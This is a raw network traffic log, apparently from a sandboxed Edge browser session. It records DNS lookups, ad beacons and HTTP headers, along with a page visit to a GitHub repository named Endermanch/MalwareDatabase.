Remote address:8.8.8.8:53Requestyt3.ggpht.comIN AResponseyt3.ggpht.comIN CNAMEphotos-ugc.l.googleusercontent.comphotos-ugc.l.googleusercontent.comIN A142.250.179.97
-
Remote address:172.217.20.198:443RequestGET /instream/ad_status.js HTTP/2.0
host: static.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.214.170:443RequestOPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.178.132:443RequestGET /js/th/4FCBsbVWt5jZVKm36Bs_QtpgBkunTUSSklJnPgMburg.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://yt3.ggpht.com/S_--VnJzquEW-dq6nRUnBIFxErUGXYScvvTgjxKHk4F38KSSSk5sculuXWDgU-b-39nm82X6Zw=s68-c-k-c0x00ffffff-no-rjmsedge.exeRemote address:142.250.179.97:443RequestGET /S_--VnJzquEW-dq6nRUnBIFxErUGXYScvvTgjxKHk4F38KSSSk5sculuXWDgU-b-39nm82X6Zw=s68-c-k-c0x00ffffff-no-rj HTTP/2.0
host: yt3.ggpht.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request194.20.217.172.in-addr.arpaIN PTRResponse194.20.217.172.in-addr.arpaIN PTRpar10s50-in-f21e100net194.20.217.172.in-addr.arpaIN PTRwaw02s08-in-f194�H194.20.217.172.in-addr.arpaIN PTRwaw02s08-in-f2�H
-
Remote address:8.8.8.8:53Request198.20.217.172.in-addr.arpaIN PTRResponse198.20.217.172.in-addr.arpaIN PTRwaw02s08-in-f61e100net198.20.217.172.in-addr.arpaIN PTRwaw02s08-in-f198�H198.20.217.172.in-addr.arpaIN PTRpar10s50-in-f6�H
-
Remote address:8.8.8.8:53Request170.214.58.216.in-addr.arpaIN PTRResponse170.214.58.216.in-addr.arpaIN PTRmad01s26-in-f1701e100net170.214.58.216.in-addr.arpaIN PTRpar10s42-in-f10�J170.214.58.216.in-addr.arpaIN PTRmad01s26-in-f10�J
-
Remote address:8.8.8.8:53Request97.179.250.142.in-addr.arpaIN PTRResponse97.179.250.142.in-addr.arpaIN PTRpar21s20-in-f11e100net
-
Remote address:8.8.8.8:53Request132.178.250.142.in-addr.arpaIN PTRResponse132.178.250.142.in-addr.arpaIN PTRpar21s22-in-f41e100net
-
Remote address:8.8.8.8:53Request67.213.58.216.in-addr.arpaIN PTRResponse67.213.58.216.in-addr.arpaIN PTRpar21s18-in-f31e100net67.213.58.216.in-addr.arpaIN PTRlhr25s01-in-f67�G67.213.58.216.in-addr.arpaIN PTRlhr25s01-in-f3�G
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0ERemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=04ED2FC948FC6DE317D03BB749DB6C6B; domain=.bing.com; expires=Sat, 07-Jun-2025 19:48:08 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4E33B96B94F44FD68240A8E77A43D37A Ref B: LON04EDGE0717 Ref C: 2024-05-13T19:48:08Z
date: Mon, 13 May 2024 19:48:08 GMT
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0ERemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GfUyV2_4IlfS5mO1-GoXFDVUCUz5Np7mDwAWn2ZX1Syuo5d2xAV1KeuXQI5sypdrqn0Apy_wHJ2CymNHdaWIuBcXpy8gDjzhS8lJJVsPeL3JH1hpPCK5sTD-7PqsvDG0n7ZiBIydgkUYBFe8pyJ0cCjP8L07UwETvwetbihAHkgi0YhD%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dc128350ffede14b752cf5324570fd7ab&TIME=20240426T131944Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04ED2FC948FC6DE317D03BB749DB6C6B; _EDGE_S=SID=23B0E4FD387B652A29AAF0833902640D
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=PjPDV_4fClhj1A6Y4yK-jMm_qE24meK3uEwgeFdBKhM; domain=.bing.com; expires=Sat, 07-Jun-2025 19:48:09 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1CD2BE63E30942E9A327A1A2B508A928 Ref B: LON04EDGE0717 Ref C: 2024-05-13T19:48:09Z
date: Mon, 13 May 2024 19:48:09 GMT
-
GEThttps://www.bing.com/aes/c.gif?RG=eaacba607e8d4fffae645607ced413e3&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131944Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893Remote address:23.62.61.170:443RequestGET /aes/c.gif?RG=eaacba607e8d4fffae645607ced413e3&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131944Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=04ED2FC948FC6DE317D03BB749DB6C6B
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 461465C5AB304ED2B733656CA8A5F14D Ref B: LON212050704047 Ref C: 2024-05-13T19:48:09Z
content-length: 0
date: Mon, 13 May 2024 19:48:09 GMT
set-cookie: _EDGE_S=SID=23B0E4FD387B652A29AAF0833902640D; path=/; httponly; domain=bing.com
set-cookie: MUIDB=04ED2FC948FC6DE317D03BB749DB6C6B; path=/; httponly; expires=Sat, 07-Jun-2025 19:48:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.a63d3e17.1715629689.3469ff1
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request170.61.62.23.in-addr.arpaIN PTRResponse170.61.62.23.in-addr.arpaIN PTRa23-62-61-170deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
GEThttps://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90Remote address:23.62.61.170:443RequestGET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=04ED2FC948FC6DE317D03BB749DB6C6B; _EDGE_S=SID=23B0E4FD387B652A29AAF0833902640D; MSPTC=PjPDV_4fClhj1A6Y4yK-jMm_qE24meK3uEwgeFdBKhM; MUIDB=04ED2FC948FC6DE317D03BB749DB6C6B
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Mon, 13 May 2024 19:48:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.a63d3e17.1715629691.346acff
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:20.26.156.215:443RequestOPTIONS /Endermanch/MalwareDatabase HTTP/2.0
host: github.com
accept: */*
access-control-request-method: GET
access-control-request-headers: turbolinks-referrer
origin: https://malwarewatch.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 404
date: Mon, 13 May 2024 19:48:20 GMT
content-type: text/html; charset=utf-8
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
vary: Accept-Encoding, Accept, X-Requested-With
content-encoding: gzip
x-github-request-id: D94A:2CDC03:1FC2CB5:230C958:66426E84
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase HTTP/2.0
host: github.com
cache-control: max-age=0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:21 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"27a505cbcad9751fa06bccb17837f65a"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
set-cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.1831426451.1715629700; Path=/; Domain=github.com; Expires=Tue, 13 May 2025 19:48:20 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Tue, 13 May 2025 19:48:20 GMT; HttpOnly; Secure; SameSite=Lax
accept-ranges: bytes
x-github-request-id: F456:3129D7:19AD4BA:1C5967B:66426E84
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/fragment+html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: F456:3129D7:19AD55D:1C59728:66426E85
-
GEThttps://github.com/Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9msedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9 HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
date: Mon, 13 May 2024 19:48:22 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ 